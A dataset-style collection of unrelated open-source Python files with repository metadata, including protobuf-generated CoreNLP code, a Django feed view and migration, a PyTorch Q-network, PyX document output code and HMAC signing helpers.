_sym_db.RegisterMessage(Entity)
Relation = _reflection.GeneratedProtocolMessageType('Relation', (_message.Message,), dict(
DESCRIPTOR = _RELATION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Relation)
))
_sym_db.RegisterMessage(Relation)
Operator = _reflection.GeneratedProtocolMessageType('Operator', (_message.Message,), dict(
DESCRIPTOR = _OPERATOR,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Operator)
))
_sym_db.RegisterMessage(Operator)
Polarity = _reflection.GeneratedProtocolMessageType('Polarity', (_message.Message,), dict(
DESCRIPTOR = _POLARITY,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Polarity)
))
_sym_db.RegisterMessage(Polarity)
NERMention = _reflection.GeneratedProtocolMessageType('NERMention', (_message.Message,), dict(
DESCRIPTOR = _NERMENTION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.NERMention)
))
_sym_db.RegisterMessage(NERMention)
SentenceFragment = _reflection.GeneratedProtocolMessageType('SentenceFragment', (_message.Message,), dict(
DESCRIPTOR = _SENTENCEFRAGMENT,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.SentenceFragment)
))
_sym_db.RegisterMessage(SentenceFragment)
RelationTriple = _reflection.GeneratedProtocolMessageType('RelationTriple', (_message.Message,), dict(
DESCRIPTOR = _RELATIONTRIPLE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.RelationTriple)
))
_sym_db.RegisterMessage(RelationTriple)
MapStringString = _reflection.GeneratedProtocolMessageType('MapStringString', (_message.Message,), dict(
DESCRIPTOR = _MAPSTRINGSTRING,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.MapStringString)
))
_sym_db.RegisterMessage(MapStringString)
MapIntString = _reflection.GeneratedProtocolMessageType('MapIntString', (_message.Message,), dict(
DESCRIPTOR = _MAPINTSTRING,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.MapIntString)
))
_sym_db.RegisterMessage(MapIntString)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\031edu.stanford.nlp.pipelineB\rCoreNLPProtos'))
_DEPENDENCYGRAPH.fields_by_name['root'].has_options = True
_DEPENDENCYGRAPH.fields_by_name['root']._options = _descriptor._ParseOptions(descriptor_pb2.FieldOptions(), _b('\020\001'))
# @@protoc_insertion_point(module_scope)
| [
"chaganty@stanford.edu"
] | chaganty@stanford.edu |
34b10e72f10087aaa703323b4c4bb1e1fefdc4d2 | 5b7d5723b84f5011965aba18ebf0c080253b2fcb | /posts/views/feed.py | 607dc5b67c34d133f749e9e5c0c63d56c801c80a | [
"MIT"
] | permissive | ReDetection/vas3k.club | 5980e6849ccf2e67a380d80d23036ec09ed94453 | ad97fefca5ec52047b2daad77ddf2eb2aecb03b3 | refs/heads/master | 2023-06-11T19:48:56.730541 | 2020-08-12T17:44:26 | 2020-08-12T17:44:26 | 287,545,618 | 0 | 0 | MIT | 2020-08-14T13:58:31 | 2020-08-14T13:58:30 | null | UTF-8 | Python | false | false | 2,905 | py | from datetime import datetime, timedelta
from django.db.models import Q
from django.http import Http404
from django.shortcuts import get_object_or_404, render
from auth.helpers import auth_required
from common.pagination import paginate
from posts.models import Post, Topic
POST_TYPE_ALL = "all"
ORDERING_ACTIVITY = "activity"
ORDERING_NEW = "new"
ORDERING_TOP = "top"
ORDERING_TOP_WEEK = "top_week"
ORDERING_TOP_MONTH = "top_month"
@auth_required
def feed(request, post_type=POST_TYPE_ALL, topic_slug=None, ordering=ORDERING_ACTIVITY):
post_type = post_type or Post
if request.me:
request.me.update_last_activity()
posts = Post.objects_for_user(request.me)
else:
posts = Post.visible_objects()
# filter posts by type
if post_type != POST_TYPE_ALL:
posts = posts.filter(type=post_type)
# filter by topic
topic = None
if topic_slug:
topic = get_object_or_404(Topic, slug=topic_slug)
posts = posts.filter(topic=topic)
# hide non-public posts and intros from unauthorized users
if not request.me:
posts = posts.exclude(is_public=False).exclude(type=Post.TYPE_INTRO)
# exclude shadow banned posts, but show them in "new" tab
if ordering != ORDERING_NEW:
if request.me:
posts = posts.exclude(Q(is_shadow_banned=True) & ~Q(author_id=request.me.id))
else:
posts = posts.exclude(is_shadow_banned=True)
# no type and topic? probably it's the main page, let's apply some more filters
if not topic and post_type == POST_TYPE_ALL:
posts = posts.filter(is_visible_on_main_page=True)
# order posts by some metric
if ordering:
if ordering == ORDERING_ACTIVITY:
posts = posts.order_by("-last_activity_at")
elif ordering == ORDERING_NEW:
posts = posts.order_by("-published_at", "-created_at")
elif ordering == ORDERING_TOP:
posts = posts.order_by("-upvotes")
elif ordering == ORDERING_TOP_WEEK:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=7)
).order_by("-upvotes")
elif ordering == ORDERING_TOP_MONTH:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=31)
).order_by("-upvotes")
else:
raise Http404()
# split results into pinned and unpinned posts on main page
pinned_posts = []
if ordering == ORDERING_ACTIVITY:
pinned_posts = posts.filter(is_pinned_until__gte=datetime.utcnow())
posts = posts.exclude(id__in=[p.id for p in pinned_posts])
return render(request, "posts/feed.html", {
"post_type": post_type or POST_TYPE_ALL,
"ordering": ordering,
"topic": topic,
"posts": paginate(request, posts),
"pinned_posts": pinned_posts,
})
| [
"me@vas3k.ru"
] | me@vas3k.ru |
5c3b9ce4daac002df7317fca1d9da2026544660a | 82205ef1622ef3bb3bd4982f6ddc52509686af8c | /numba2/pipeline.py | 6a3813352da9a461afdad7bd801f5f684e75bdd7 | [] | no_license | cooperliu101/numba-lang | 22f1567e17cd7cf831f254bf64bc7e3192c973c3 | 37abfcbb516175153e73474dababb2d89cba7a8b | refs/heads/master | 2021-07-21T14:35:23.943243 | 2013-11-15T12:07:53 | 2013-11-15T12:07:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,460 | py | # -*- coding: utf-8 -*-
"""
Pipeline that determines phase ordering and execution.
"""
from __future__ import print_function, division, absolute_import
import dis
import types
import pykit.ir
#===------------------------------------------------------------------===
# Pipeline
#===------------------------------------------------------------------===
def run_pipeline(func, env, passes):
"""
Run a sequence of transforms (given as functions or modules) on the
AIR function.
"""
env['numba.state.crnt_func'] = func
for transform in passes:
func, env = apply_transform(transform, func, env)
env['numba.state.crnt_func'] = func
return func, env
def apply_transform(transform, func, env):
if isinstance(transform, types.ModuleType):
result = transform.run(func, env)
else:
result = transform(func, env)
result = _check_transform_result(transform, func, env, result)
return result or (func, env)
def _check_transform_result(transform, func, env, result):
if result is not None and not isinstance(result, tuple):
if isinstance(result, pykit.ir.Function):
return result, env
if isinstance(transform, types.ModuleType):
transform = transform.run
transform = transform.__module__ + '.' + transform.__name__
raise ValueError(
"Expected (func, env) result in %r, got %s" % (transform, result))
return result | [
"markflorisson88@gmail.com"
] | markflorisson88@gmail.com |
da6271e4473c4f6128fa66d16c48da1dbdb346d2 | e9ada720b2ba54bdf26cce9b0d2bc010c66eca72 | /model.py | 7a09d58f62b2d9c5cb9e35ff7b41c55ff5f44152 | [] | no_license | ErnstDinkelmann/udacity_deeprl_banana_nav | 1038135390acd966d9e7cb27b107c991d04c14ba | cedd34475358b49ae0000a18280a72b8b5065f0e | refs/heads/master | 2020-04-03T10:37:16.175955 | 2018-12-06T10:23:52 | 2018-12-06T10:23:52 | 155,197,689 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
class QNetwork(nn.Module):
"""Actor (Policy) Model."""
def __init__(self, state_size, action_size, seed, int_hl_1_num_units=32, int_hl_2_num_units=32):
"""Initialize parameters and build model.
Params
======
state_size (int): Dimension of each state
action_size (int): Dimension of each action
seed (int): Random seed
"""
super(QNetwork, self).__init__()
self.seed = torch.manual_seed(seed)
# Defining the layers
self.fc1 = nn.Linear(state_size, int_hl_1_num_units, bias=True)
self.fc2 = nn.Linear(int_hl_1_num_units, int_hl_2_num_units, bias=True)
self.fc3 = nn.Linear(int_hl_2_num_units, action_size)
# def forward(self, state):
def forward(self, x):
"""Build a network that maps state -> action values."""
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.fc3(x)
return x
| [
"ernst.dinkelmann@gmail.com"
] | ernst.dinkelmann@gmail.com |
f3e7ef114ef2471fbf5671381769253a62f14fce | f693c9c487d31a677f009afcdf922b4e7f7d1af0 | /biomixer-venv/bin/rst2latex.py | f2bf88ab2545f14b13e630bbf6232fa0aac977a0 | [
"MIT"
] | permissive | Shellowb/BioMixer | 9048b6c07fa30b83c87402284f0cebd11a58e772 | 1939261589fe8d6584a942a99f0308e898a28c1c | refs/heads/master | 2022-10-05T08:16:11.236866 | 2021-06-29T17:20:45 | 2021-06-29T17:20:45 | 164,722,008 | 1 | 3 | MIT | 2022-09-30T20:23:34 | 2019-01-08T19:52:12 | Python | UTF-8 | Python | false | false | 831 | py | #!/home/shello/Documents/BioMixer/biomixer-venv/bin/python
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
| [
"marcelo.becerra@ug.uchile.cl"
] | marcelo.becerra@ug.uchile.cl |
93adb7797d8a7c1cc59d5a0b27f379fc78998961 | 3f2271fae5a2f8ffec65b1d679f8b9891f7259fe | /lib/python3.6/site-packages/pyx/document.py | bc91c41408822ca1be0b6c59754549f6df35fc77 | [] | no_license | VirSanctus/SpiderWeb | 7fffeae325a8987f971e4ce26c2e2cc26d70262c | ce4c2bbf2d0023ae63ecd9dd05d501588afb0760 | refs/heads/master | 2022-11-07T14:33:33.252843 | 2019-05-30T06:35:54 | 2019-05-30T06:35:54 | 189,094,755 | 0 | 1 | null | 2022-11-01T17:28:27 | 2019-05-28T20:00:11 | Python | UTF-8 | Python | false | false | 8,295 | py | # -*- encoding: utf-8 -*-
#
#
# Copyright (C) 2005-2011 Jörg Lehmann <joergl@users.sourceforge.net>
# Copyright (C) 2005-2011 André Wobst <wobsta@users.sourceforge.net>
#
# This file is part of PyX (http://pyx.sourceforge.net/).
#
# PyX is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# PyX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyX; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
import logging, sys
from . import bbox, pswriter, pdfwriter, svgwriter, trafo, style, unit
logger = logging.getLogger("pyx")
class paperformat:
def __init__(self, width, height, name=None):
self.width = width
self.height = height
self.name = name
paperformat.A5 = paperformat(148.5 * unit.t_mm, 210 * unit.t_mm, "A5")
paperformat.A4 = paperformat(210 * unit.t_mm, 297 * unit.t_mm, "A4")
paperformat.A3 = paperformat(297 * unit.t_mm, 420 * unit.t_mm, "A3")
paperformat.A2 = paperformat(420 * unit.t_mm, 594 * unit.t_mm, "A2")
paperformat.A1 = paperformat(594 * unit.t_mm, 840 * unit.t_mm, "A1")
paperformat.A0 = paperformat(840 * unit.t_mm, 1188 * unit.t_mm, "A0")
paperformat.A0b = paperformat(910 * unit.t_mm, 1370 * unit.t_mm, None) # dedicated to our friends in Augsburg
paperformat.Letter = paperformat(8.5 * unit.t_inch, 11 * unit.t_inch, "Letter")
paperformat.Legal = paperformat(8.5 * unit.t_inch, 14 * unit.t_inch, "Legal")
def _paperformatfromstring(name):
return getattr(paperformat, name.capitalize())
class page:
def __init__(self, canvas, pagename=None, paperformat=None, rotated=0, centered=1, fittosize=0,
margin=1*unit.t_cm, bboxenlarge=1*unit.t_pt, bbox=None):
self.canvas = canvas
self.pagename = pagename
# support for deprecated string specification of paper formats
try:
paperformat + ""
except:
self.paperformat = paperformat
else:
self.paperformat = _paperformatfromstring(paperformat)
logger.warning("specification of paperformat by string is deprecated, use document.paperformat.%s instead" % paperformat.capitalize())
self.rotated = rotated
self.centered = centered
self.fittosize = fittosize
self.margin = margin
self.bboxenlarge = bboxenlarge
self.pagebbox = bbox
def _process(self, processMethod, contentfile, writer, context, registry, bbox):
# usually, it is the bbox of the canvas enlarged by self.bboxenlarge, but
# it might be a different bbox as specified in the page constructor
assert not bbox
if self.pagebbox:
bbox.set(self.pagebbox)
else:
bbox.set(self.canvas.bbox()) # this bbox is not accurate
bbox.enlarge(self.bboxenlarge)
# check whether we expect a page trafo and use a temporary canvas to insert the
# page canvas
if self.paperformat and (self.rotated or self.centered or self.fittosize) and bbox:
# calculate the pagetrafo
paperwidth, paperheight = self.paperformat.width, self.paperformat.height
# center (optionally rotated) output on page
if self.rotated:
pagetrafo = trafo.rotate(90).translated(paperwidth, 0)
if self.centered or self.fittosize:
if not self.fittosize and (bbox.height() > paperwidth or bbox.width() > paperheight):
logger.warning("content exceeds the papersize")
pagetrafo = pagetrafo.translated(-0.5*(paperwidth - bbox.height()) + bbox.bottom(),
0.5*(paperheight - bbox.width()) - bbox.left())
else:
if not self.fittosize and (bbox.width() > paperwidth or bbox.height() > paperheight):
logger.warning("content exceeds the papersize")
pagetrafo = trafo.translate(0.5*(paperwidth - bbox.width()) - bbox.left(),
0.5*(paperheight - bbox.height()) - bbox.bottom())
if self.fittosize:
if 2*self.margin > paperwidth or 2*self.margin > paperheight:
raise ValueError("Margins too broad for selected paperformat. Aborting.")
paperwidth -= 2 * self.margin
paperheight -= 2 * self.margin
# scale output to pagesize - margins
if self.rotated:
sfactor = min(unit.topt(paperheight)/bbox.width_pt(), unit.topt(paperwidth)/bbox.height_pt())
else:
sfactor = min(unit.topt(paperwidth)/bbox.width_pt(), unit.topt(paperheight)/bbox.height_pt())
pagetrafo = pagetrafo.scaled(sfactor, sfactor, self.margin + 0.5*paperwidth, self.margin + 0.5*paperheight)
bbox.transform(pagetrafo)
from . import canvas as canvasmodule
cc = canvasmodule.canvas()
cc.insert(self.canvas, [pagetrafo])
else:
cc = self.canvas
if processMethod != "processSVG":
# for SVG we write the pyx defaults as part of the svg node attributes in the writer
getattr(style.linewidth.normal, processMethod)(contentfile, writer, context, registry)
if self.pagebbox:
bbox = bbox.copy() # don't alter the bbox provided to the constructor -> use a copy
getattr(cc, processMethod)(contentfile, writer, context, registry, bbox)
def processPS(self, *args):
self._process("processPS", *args)
def processPDF(self, *args):
self._process("processPDF", *args)
def processSVG(self, *args):
self._process("processSVG", *args)
class _noclose:
def __init__(self, f):
self.f = f
def __enter__(self):
return self.f
def __exit__(self, type, value, tb):
pass
def _outputstream(file, suffix):
if file is None:
if not sys.argv[0].endswith(".py"):
raise RuntimeError("could not auto-guess filename")
return open("%s.%s" % (sys.argv[0][:-3], suffix), "wb")
if file == "-":
return _noclose(sys.stdout.buffer)
try:
file.write(b"")
except:
if not file.endswith(".%s" % suffix):
return open("%s.%s" % (file, suffix), "wb")
return open(file, "wb")
else:
return _noclose(file)
class document:
"""holds a collection of page instances which are output as pages of a document"""
def __init__(self, pages=None):
if pages is None:
self.pages = []
else:
self.pages = pages
def append(self, page):
self.pages.append(page)
def writeEPSfile(self, file=None, **kwargs):
with _outputstream(file, "eps") as f:
pswriter.EPSwriter(self, f, **kwargs)
def writePSfile(self, file=None, **kwargs):
with _outputstream(file, "ps") as f:
pswriter.PSwriter(self, f, **kwargs)
def writePDFfile(self, file=None, **kwargs):
with _outputstream(file, "pdf") as f:
pdfwriter.PDFwriter(self, f, **kwargs)
def writeSVGfile(self, file=None, **kwargs):
with _outputstream(file, "svg") as f:
svgwriter.SVGwriter(self, f, **kwargs)
def writetofile(self, filename, **kwargs):
for suffix, method in [("eps", pswriter.EPSwriter),
("ps", pswriter.PSwriter),
("pdf", pdfwriter.PDFwriter),
("svg", svgwriter.SVGwriter)]:
if filename.endswith(".{}".format(suffix)):
with open(filename, "wb") as f:
method(self, f, **kwargs)
return
raise ValueError("unknown file extension")
| [
"avielpr@checkpoint.com"
] | avielpr@checkpoint.com |
f9c5746de643c287fa2b5dd1201e7b31848a3a50 | 0685bc7b88fa33b119edbd10b67649b12fcf2994 | /utils.py | 1fd7158a16643c3be185a58c61fc319b559310af | [] | no_license | fernandogarcia547/WebScraper | 6ea14c33b53fb096486d1e6ad1c621442464eb32 | 568b5a79c7fa5229d83941460fd5617605f535af | refs/heads/master | 2020-09-24T11:05:50.858262 | 2019-12-04T00:50:07 | 2019-12-04T00:50:07 | 225,746,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | def extractNumbers(xStr):
xDigits = [int(d) for d in xStr if d.isdigit()]
xNum = np.sum([digit*(10**exponent) for digit, exponent in
zip(xDigits[::-1], range(len(xDigits)))])
return xNum
| [
"noreply@github.com"
] | fernandogarcia547.noreply@github.com |
c6a74cae264cfe137887a6a21fcbd3c2a83f69b2 | 0d885803267a021887b512cffb74ffee43e7f6f4 | /exchangeability/bin/parse-results-ml-no-sort.py | 3369a18e19113c420bad1d48b3f90f3dc039037f | [
"CC-BY-4.0"
] | permissive | joaks1/msbayes-experiments | ecc48ac73b35ec5930c48da8716b72b61fc4e62d | 72fcf3c26f6d92bdcc39343372552f45d72d8f7f | refs/heads/master | 2021-01-21T21:43:15.109146 | 2017-11-06T02:11:14 | 2017-11-06T02:11:14 | 12,230,084 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | #! /usr/bin/env python
import os
import sys
from pymsbayes.utils.parsing import DMCSimulationResults
from pymsbayes.utils.messaging import get_logger
_LOG = get_logger(__name__)
def main_cli():
bin_dir = os.path.abspath(os.path.dirname(__file__))
project_dir = os.path.abspath(os.path.dirname(bin_dir))
result_dir = os.path.abspath(os.path.join(project_dir, 'results'))
info_path = os.path.join(result_dir, 'multi-locus-no-sort', 'pymsbayes-results',
'pymsbayes-info.txt')
_LOG.info('Parsing and writing results...')
results = DMCSimulationResults(info_path)
prior_indices = results.prior_index_to_config.keys()
results.write_result_summaries(
prior_indices = prior_indices,
include_tau_exclusion_info = False)
if __name__ == '__main__':
main_cli()
| [
"joaks1@gmail.com"
] | joaks1@gmail.com |
25687f3071c625cc21d3d7dd48ca14723ceb965a | 1976212e3c44a292060da51ab56453d22cc3f69d | /LP2/AC10/lmsteste/curriculo/migrations/0001_initial.py | 7bfbacd8951faac6e3f2264e02a481260b287ced | [
"Apache-2.0"
] | permissive | luisxfelipe/Faculdade_Impacta_2semestre | 9d2f9a623a6544b42a0a7a21f6b2c6688a54a4df | ad6e0bcc22496bb96f56c5ca3d930554dd5302a4 | refs/heads/master | 2022-12-05T22:19:46.110930 | 2019-05-23T14:47:40 | 2019-05-23T14:47:40 | 170,687,194 | 0 | 0 | Apache-2.0 | 2022-11-22T03:14:30 | 2019-02-14T12:22:57 | Python | UTF-8 | Python | false | false | 4,301 | py | # Generated by Django 2.1.3 on 2018-11-29 00:22
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('contas', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Curso',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=255, unique=True)),
('sigla', models.CharField(max_length=5, unique=True)),
],
),
migrations.CreateModel(
name='Disciplina',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=255, unique=True)),
('data', models.DateField(blank=True, default=django.utils.timezone.now, null=True)),
('status', models.CharField(blank=True, default='Aberta', max_length=50, null=True)),
('plano_ensino', models.TextField(max_length=500)),
('carga_horaria', models.IntegerField()),
('competencias', models.TextField(max_length=500)),
('habilidades', models.TextField(max_length=500)),
('ementa', models.TextField(max_length=500)),
('conteudo_programatico', models.TextField(max_length=500)),
('bibliografia_basica', models.TextField(max_length=500)),
('bibliografia_complementar', models.TextField(max_length=500)),
('percentual_pratico', models.IntegerField()),
('percentual_teorico', models.IntegerField()),
('coordenador', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contas.Coordenador')),
],
),
migrations.CreateModel(
name='DisciplinaOfertada',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dt_inicio_matricula', models.DateField()),
('dt_fim_matricula', models.DateField()),
('metodologia', models.TextField(blank=True, default=None, max_length=500, null=True)),
('recursos', models.TextField(blank=True, default=None, max_length=500, null=True)),
('criterio_avaliacao', models.TextField(blank=True, default=None, max_length=500, null=True)),
('plano_aulas', models.TextField(blank=True, default=None, max_length=500, null=True)),
('coordenador', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contas.Coordenador')),
('curso', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='curriculo.Curso')),
('disciplina', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='curriculo.Disciplina')),
('professor', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.PROTECT, to='contas.Professor')),
],
options={
'verbose_name': 'oferta de disciplina',
'verbose_name_plural': 'ofertas de disciplinas',
},
),
migrations.CreateModel(
name='Turma',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ano', models.IntegerField()),
('semestre', models.IntegerField()),
('nome', models.CharField(max_length=1)),
],
),
migrations.AlterUniqueTogether(
name='turma',
unique_together={('ano', 'semestre', 'nome')},
),
migrations.AddField(
model_name='disciplinaofertada',
name='turma',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='curriculo.Turma'),
),
migrations.AlterUniqueTogether(
name='disciplinaofertada',
unique_together={('disciplina', 'curso', 'turma')},
),
]
| [
"luis.felipe-simoes@outlook.com"
] | luis.felipe-simoes@outlook.com |
5114e9fb9e89b7c121fe36ba7adffd2c63ca57fb | 1f5299e547125f7ba2c3b72984e82ba3b1f984de | /basejumper/security.py | ad0e4a6b627153a5f150932198651845b40573cd | [] | no_license | ESGF/basejump | 72b805818188ae09b1e3329035718b0816927a13 | 593d5e57e63848c30219ca9b49e25f49b59dcf82 | refs/heads/master | 2021-07-23T04:19:57.489628 | 2017-11-02T16:51:52 | 2017-11-02T16:51:52 | 47,994,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | import hmac
import hashlib
import json
import collections
def constant_time_compare(val1, val2):
# We'll allow them to know that the lengths of the strings don't match
if len(val1) != len(val2):
return False
result = 0
for x, y in zip(val1, val2):
result |= ord(x) ^ ord(y)
return result == 0
def hmac_compare(key, msg, known):
h = hmac.new(key, msg, hashlib.sha256)
return constant_time_compare(h.hexdigest(), known)
def get_dict_signature(dictionary, key):
h = hmac.new(key, digestmod=hashlib.sha256)
for k in sorted(dictionary.keys()):
h.update(k)
h.update(str(dictionary[k]))
return h.hexdigest()
def check_json_sig(dictionary, key, signature):
return constant_time_compare(get_dict_signature(dictionary, key), signature)
def sign_path(path, key):
h = hmac.new(key, path, hashlib.sha256)
return h.hexdigest()
| [
"fries2@llnl.gov"
] | fries2@llnl.gov |
c433ae0599808eb1ea13010018c8a7e094198719 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/189/29190/submittedfiles/swamee.py | 3b19ef457ff49af07dc44e820878bdc4c334e957 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | # -*- coding: utf-8 -*-
import math
f= float(input('digite f:'))
l= float(input('digite l:'))
q= float(input('digite q:'))
delta= float(input('digite delta:'))
v= float(input('digite v:'))
d=(8*f*l*(q*q)/3.14159**2*9.81*delta)/(1/5)
rey=((4*q)/(3.14159*d*v))
k=0.25/(math.log10(0.000002/3.7*d+5.74/rey**0.9))**2
print('O valor de D é %.4f' %d)
print('O valor de Rey é %.4f' %rey)
print('O valor de K é %.4f' %k) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
e54ad01c09d5f78376da8b5cbb41acdcd81a7a0e | caeecdf46b10a652ad93152146f0983694766e9d | /openeducat_noticeboard/models/notice_board.py | fde0bde44cb117055c2209050c0f1d5dc7c15022 | [] | no_license | aneesfathima/school_management | 010e4bee57b2aea9863ba7d1ecbbfa28182f3ecc | eda2d7699a1110ad903041abdce31aa4da296e9b | refs/heads/master | 2021-01-06T09:47:43.945540 | 2020-02-18T06:54:03 | 2020-02-18T06:54:03 | 241,285,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # -*- coding: utf-8 -*-
import datetime
import time
import calendar
from odoo import http, fields
from odoo.http import request
from odoo import models, fields, api
class openeducat_noticeboard(models.Model):
_name = 'openeducat_noticeboard.noticeboard'
title = fields.Char('Title', required=True)
content = fields.Text('Content')
time = fields.Datetime('Date And Time')
| [
"noreply@github.com"
] | aneesfathima.noreply@github.com |
c4aa501029ce3d847f0c6daa42556caa5f1b5f4d | 3bf004648ac22448cef6912e775bab46148d0978 | /zr/api.py | 07b831456d5f847e892d30b1a57c348e10ca63d0 | [] | no_license | ncats/zebra_rank | 2f5959cf1886318b66a8b464095156ea4ee7aece | d8fd697c54941cf0739dc0e1a68642113202cadf | refs/heads/master | 2022-11-28T03:11:01.070696 | 2020-08-07T21:39:34 | 2020-08-07T21:39:34 | 281,787,726 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,171 | py | from django.http import HttpResponse, Http404
from django.views.decorators.csrf import csrf_exempt
import json, re, sys, logging, traceback
from . import rank_phenotypes as rp
logger = logging.getLogger(__name__)
ORPHANET = rp.ZebraRank('weights_disease_S_ORDO_ORPHANET.json',
'weights_phenotype_S_ORDO_ORPHANET.json')
GARD = rp.ZebraRank('weights_disease_S_GARD.json',
'weights_phenotype_S_GARD.json')
data_sources = {
'orphanet': ORPHANET,
'gard': GARD
}
def index(request):
return HttpResponse('This is the API for ZebraRank', status=200)
def sources(request):
return HttpResponse(json.dumps(list(data_sources.keys()), indent=2),
content_type='application/json', status=200)
def phenotypes(request, name):
max = 10
skip = 0
if 'skip' in request.GET:
skip = int(request.GET['skip'])
if 'max' in request.GET:
max = int(request.GET['max'])
name = name.lower()
matches = []
for hp in rp.ZebraRank.PHENOTYPES.values():
# print(hp)
phenotype = hp['name']
match = None
if isinstance(phenotype, list):
for n in phenotype:
m = n.lower().find(name)
if m >= 0:
match = {
'id': hp['id'],
'text': n,
'pos': m
}
break
else:
m = phenotype.lower().find(name)
if m >= 0:
match = {
'id': hp['id'],
'text': phenotype,
'pos': m
}
if match:
#logger.debug('matched... %s' % match)
matches.append(match)
if len(matches) > 0:
matches = sorted(
matches, key = lambda x : x['pos']*len(x['text']))[skip:skip+max]
results = {
'query': name,
'results': matches
}
return HttpResponse(json.dumps(results, indent=2),
content_type='application/json', status=200)
@csrf_exempt
def zebra_rank(request, source):
phenotypes = []
if request.method == 'GET':
if 'phenotypes' in request.GET:
phenotypes = request.GET['phenotypes'].split(',')
elif request.method == 'POST':
try:
phenotypes = json.loads(request.body)
except:
logger.debug("Unexpected error: %s" % sys.exc_info())
return HttpResponse('Content is not JSON', status=400)
source = source.lower()
if source == 'gard' or source == 'orphanet':
pass
else:
return HttpResponse('Unknown source: %s' % source, status=404)
results = []
if len(phenotypes) > 0:
results = data_sources[source].rank_phenotypes_weighted_tfidf(phenotypes)
results = [{'score': r[0],
'disease': r[1],
'matched_phenotypes': list(r[2])} for r in results]
return HttpResponse(json.dumps(results, indent=2),
content_type='application/json', status=200)
| [
"caodac@gmail.com"
] | caodac@gmail.com |
8e600ba35e9805cb66645133fcc401dfbef6301f | d2fc8f3d180ad519957b7ebfa2c59cd3c33d52bd | /las/bin/run.py | 89cfc39f3dbb0a363490a159f117d60823d389de | [] | no_license | 0xAlwaysDumpling/PhraseVectorExperiment | 6a03a97f41a5445659f457876bbb028b1c07db0b | 95839261847186a58e930f83bb830854e1be1ad4 | refs/heads/master | 2022-07-29T20:18:06.166146 | 2016-11-06T23:38:36 | 2016-11-06T23:38:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,290 | py | __author__ = 'Johnny'
import sys,os,inspect
ff_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../model/feedforward/")))
cnn_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../model/cnn/")))
if ff_subfolder not in sys.path:
sys.path.insert(0, ff_subfolder)
if cnn_subfolder not in sys.path:
sys.path.insert(0, cnn_subfolder)
import singlelayer as sln
import multilayer as mln
import cnn as cn
def main():
name = sys.argv[1]
